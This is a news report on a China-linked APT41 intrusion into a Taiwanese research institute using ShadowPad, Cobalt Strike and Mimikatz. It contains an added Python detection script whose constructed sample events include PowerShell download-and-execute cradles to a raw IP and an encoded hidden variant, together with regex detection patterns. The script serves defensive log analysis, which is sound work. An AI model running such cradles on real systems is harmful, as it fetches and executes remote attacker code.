A Taiwanese government-affiliated research institute that specializes in computing and related technologies was breached by nation-state threat actors with ties to China, according to new findings from Cisco Talos.
The unnamed organization was targeted as early as mid-July 2023 to deliver a variety of backdoors and post-compromise tools such as ShadowPad and Cobalt Strike. The activity has been attributed with medium confidence to a prolific hacking group tracked as APT41.
“The ShadowPad malware used in the current campaign exploited an outdated, vulnerable version of the Microsoft Office IME binary as a loader to load a customized second-stage loader for launching the payload,” security researchers Joey Chen, Ashley Shen, and Vitor Ventura said.
“The threat actor compromised three hosts in the target environment and was able to steal some documents from the network.”
Cisco Talos said it discovered the activity in August 2023 after spotting what it called “abnormal PowerShell commands” connecting to an IP address to download and execute PowerShell scripts inside the compromised environment.
The exact initial access vector used in the attack is unknown, although it involved using a web shell to maintain persistent access and drop additional payloads such as ShadowPad and Cobalt Strike, the latter delivered via a Go-based Cobalt Strike loader called CS-Avoid-Killing.
“The Cobalt Strike malware was designed to use an anti-AV loader to bypass AV detection and avoid security product quarantine,” the researchers said.
Alternatively, the threat actor has been observed running PowerShell commands that execute scripts responsible for loading ShadowPad into memory and fetching the Cobalt Strike malware from the command-and-control (C2) server. A DLL-based ShadowPad loader, also known as ScatterBee, is executed via DLL side-loading.
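The two PowerShell behaviours the article describes (a download cradle reaching out to a bare IP address to fetch and execute a script, and a script that loads a payload into memory) are exactly what script-block logging (Event ID 4104) surfaces. The following is an added example of detection logic over that telemetry; it is not code from Cisco Talos or from the report, the sample events, host names and rule names are constructed for illustration, and the `-EncodedCommand` handling is included because a base64 UTF-16LE wrapper is the usual way such cradles hide from naive string matching.

```python
import base64
import binascii
import re
from dataclasses import dataclass


def _encode_ps(cmd: str) -> str:
    """Encode a command the way powershell -EncodedCommand expects (UTF-16LE, base64)."""
    return base64.b64encode(cmd.encode("utf-16le")).decode("ascii")


# Constructed sample records in the shape of PowerShell ScriptBlock logging
# (Event ID 4104 ScriptBlockText). Illustrative only, not telemetry from the
# Talos investigation; hosts and users are made up.
SAMPLE_EVENTS = [
    {"host": "ws01", "user": "CORP\\alice",
     "script": "Get-ChildItem C:\\Users\\alice\\Documents | Measure-Object"},
    {"host": "ws03", "user": "CORP\\bob",
     "script": "Invoke-WebRequest -Uri https://updates.example.com/patch.msi -OutFile C:\\temp\\patch.msi"},
    {"host": "srv02", "user": "CORP\\svc_web",
     "script": "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10:8080/a.ps1')"},
    {"host": "srv02", "user": "CORP\\svc_web",
     "script": "$b=[Convert]::FromBase64String($d);[Reflection.Assembly]::Load($b).EntryPoint.Invoke($null,$null)"},
    {"host": "srv04", "user": "CORP\\svc_web",
     "script": "powershell -nop -w hidden -enc " + _encode_ps(
         "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/b.ps1')")},
]

# URL whose host is an IPv4 literal (legitimate software updates rarely use one)
IPV4_URL = re.compile(r"https?://(?:\d{1,3}\.){3}\d{1,3}(?::\d+)?/", re.I)
# Common PowerShell download primitives and their aliases
DOWNLOAD = re.compile(r"DownloadString|DownloadFile|DownloadData|Invoke-WebRequest|\biwr\b"
                      r"|Invoke-RestMethod|\birm\b|Start-BitsTransfer", re.I)
# Execution of fetched content straight from memory
EXEC = re.compile(r"\bIEX\b|Invoke-Expression", re.I)
# In-memory loading of a native or .NET payload, as a ShadowPad-style loader would do
INMEM = re.compile(r"Reflection\.Assembly\]::Load\b|VirtualAlloc|Marshal\]::Copy", re.I)
# -e / -ec / -enc / -EncodedCommand followed by a base64 blob
ENCODED = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)


@dataclass(frozen=True)
class Finding:
    host: str
    user: str
    rule: str
    evidence: str


def decode_encoded_command(script: str):
    """Return the plaintext of a -EncodedCommand argument, or None if absent or undecodable."""
    m = ENCODED.search(script)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def analyse(event: dict) -> list[Finding]:
    """Apply the detection rules to one script block, including any encoded payload it carries."""
    host, user, script = event["host"], event["user"], event["script"]
    findings: list[Finding] = []
    decoded = decode_encoded_command(script)
    if decoded is not None:
        findings.append(Finding(host, user, "encoded-command", decoded[:80]))
        script = script + "\n" + decoded  # the rules below see both layers
    if DOWNLOAD.search(script) and IPV4_URL.search(script):
        rule = "download-cradle-ip-exec" if EXEC.search(script) else "download-from-raw-ip"
        findings.append(Finding(host, user, rule, IPV4_URL.search(script).group(0)))
    if INMEM.search(script):
        findings.append(Finding(host, user, "in-memory-load", INMEM.search(script).group(0)))
    return findings


def scan(events) -> list[Finding]:
    return [f for e in events for f in analyse(e)]


def affected_hosts(findings) -> dict[str, set[str]]:
    """Group triggered rules per host so the scope of the intrusion is visible at a glance."""
    out: dict[str, set[str]] = {}
    for f in findings:
        out.setdefault(f.host, set()).add(f.rule)
    return out


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"{f.host:6} {f.user:14} {f.rule:24} {f.evidence}")
```

Run against the constructed events, the ordinary file listing and the update download from a named host produce nothing, while the cradle to the raw IP, the reflective assembly load, and the encoded wrapper (whose decoded content is scanned again) are each flagged and grouped by host. Requiring an IPv4-literal host keeps the download rule from firing on routine package downloads; an environment that legitimately pulls scripts from bare IPs would need an allowlist added to that check.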
Some of the other steps performed as part of the infiltration included using Mimikatz to extract passwords and running several commands to collect information about user accounts, directory structures, and network configuration.
“APT41 created a tailored loader to inject a proof of concept for CVE-2018-0824 directly into memory, utilizing a remote code execution vulnerability to achieve local privilege escalation,” Talos said, noting that the final payload, UnmarshalPwn, is unleashed after passing through three different stages.
The cybersecurity company also highlighted the adversary’s attempts to avoid detection by halting its own activity when other users are detected on the system. “Once the backdoors are deployed, the attacker will remove the web shell and guest account that allowed the initial access,” the researchers said.
The disclosure comes as Germany revealed earlier this week that Chinese state actors were behind a 2021 cyber attack on the country’s national mapping agency, the Federal Agency for Cartography and Geodesy (BKG), for espionage purposes.
The Chinese embassy in Berlin rejected the accusation as baseless and called on Germany to “stop the practice of using cyber security issues to defame China politically and in the media”.